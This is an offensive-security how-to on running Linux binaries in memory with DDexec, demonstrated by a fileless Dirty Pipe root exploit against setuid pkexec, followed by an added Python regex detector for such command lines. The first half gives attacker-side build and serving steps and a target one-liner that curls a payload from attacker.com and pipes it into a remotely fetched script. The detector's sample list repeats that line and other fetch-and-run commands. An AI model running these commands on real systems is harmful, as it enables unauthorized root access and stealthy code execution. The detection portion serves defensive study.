Executing Linux Binaries Without Touching Disk

Limitations

This attack depends on the following tools being present on the target machine:

dd
bash | zsh | ash (busybox)
setarch | linux64 (busybox)
head
tail
cut
grep
od
readlink
wc
tr
base64
sleep

Example: running the Dirty Pipe exploit in memory, without touching the disk, to gain root privileges.

The Dirty Pipe exploit is run on the target machine without writing anything to disk. The exploit needs a setuid binary; we will use /usr/bin/pkexec, which is setuid, for privilege escalation.

On the attacker machine:

# Download and compile the Dirty Pipe exploit (exploit-2.c)
https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits/blob/main/exploit-2.c
gcc exploit-2.c -o dp-setuid

# Base64-encode the dp-setuid binary (single line, no wrapping)
base64 -w0 ./dp-setuid > dp-setuid.b64

# Download DDexec
https://github.com/arget13/DDexec

# Run an HTTP listener to serve both files
python3 -m http.server 80

On the target machine:

# Run the following command (the base64 payload is piped into DDexec, which is itself fetched and run via process substitution)
curl attacker.com/dp-setuid.b64 | bash <(curl attacker.com/ddexec.sh) /bin/randomename /usr/bin/pkexec
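From the defender's side, the command above has a recognisable shape: a remote fetch piped straight into a shell, a second fetch inside a process substitution, and a setuid target passed as an argument. The following script is an added detection example, not part of the original page or of the DDexec project. It applies a handful of regex rules to constructed sample command lines (as would appear in auditd EXECVE records or a shell audit log); the first sample is the command from this page, the rest are made up. The rule for dd writing into /proc/<pid>/mem is based on DDexec's own documented approach and is not something this page states; the setuid list is an assumption you would tune to your own environment.

```python
import re

# Constructed sample command lines (not real captures). The first is the
# command shown on this page; the others are invented benign/malicious mixes.
SAMPLE_CMDLINES = [
    "curl attacker.com/dp-setuid.b64 | bash <(curl attacker.com/ddexec.sh) /bin/randomename /usr/bin/pkexec",
    "base64 -d payload.b64 | bash",
    "dd if=/tmp/x of=/proc/1234/mem bs=1 seek=94000",
    "curl https://example.org/index.html -o index.html",
    "base64 -w0 ./report.pdf > report.b64",
    "ls -la /usr/bin/pkexec",
]

SHELLS = r"(bash|sh|zsh|ash|dash)"

# Each rule: (name, compiled regex). Order matters only for readability.
RULES = [
    # curl/wget output piped directly into an interpreter
    ("remote_fetch_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*" + SHELLS + r"\b")),
    # a script fetched inside a process substitution: bash <(curl ...)
    ("remote_fetch_in_process_substitution",
     re.compile(r"\b(bash|zsh)\s+<\(\s*(curl|wget)\b")),
    # base64-decoded content piped into an interpreter
    ("base64_decode_piped_to_shell",
     re.compile(r"\bbase64\s+(-d|--decode)\b[^|]*\|\s*" + SHELLS + r"\b")),
    # dd writing into a live process's memory (assumed DDexec behaviour)
    ("dd_writes_process_memory",
     re.compile(r"\bdd\b.*\bof=/proc/(self|\d+)/mem\b")),
]

# Assumed list of setuid binaries worth flagging when combined with a hit above.
SETUID_TARGETS = ("/usr/bin/pkexec", "/usr/bin/sudo", "/usr/bin/su")


def classify(cmdline: str) -> list[str]:
    """Return the names of all rules that match one command line.

    A setuid target on its own is benign (e.g. `ls -la /usr/bin/pkexec`); it is
    only reported when at least one of the execution rules already fired.
    """
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    if hits and any(target in cmdline for target in SETUID_TARGETS):
        hits.append("setuid_binary_referenced")
    return hits


def scan(cmdlines: list[str]) -> dict[str, list[str]]:
    """Map each flagged command line to the rules it triggered; drop clean ones."""
    flagged = {}
    for cmd in cmdlines:
        hits = classify(cmd)
        if hits:
            flagged[cmd] = hits
    return flagged


if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_CMDLINES).items():
        print(f"{', '.join(hits)}\n    {cmd}")
```

In practice you would feed this the `a0..aN` fields of auditd EXECVE events (or a process-creation feed from your EDR) rather than a static list; the regexes are deliberately narrow so that ordinary `curl -o` downloads and `base64 -w0` encoding of files do not fire.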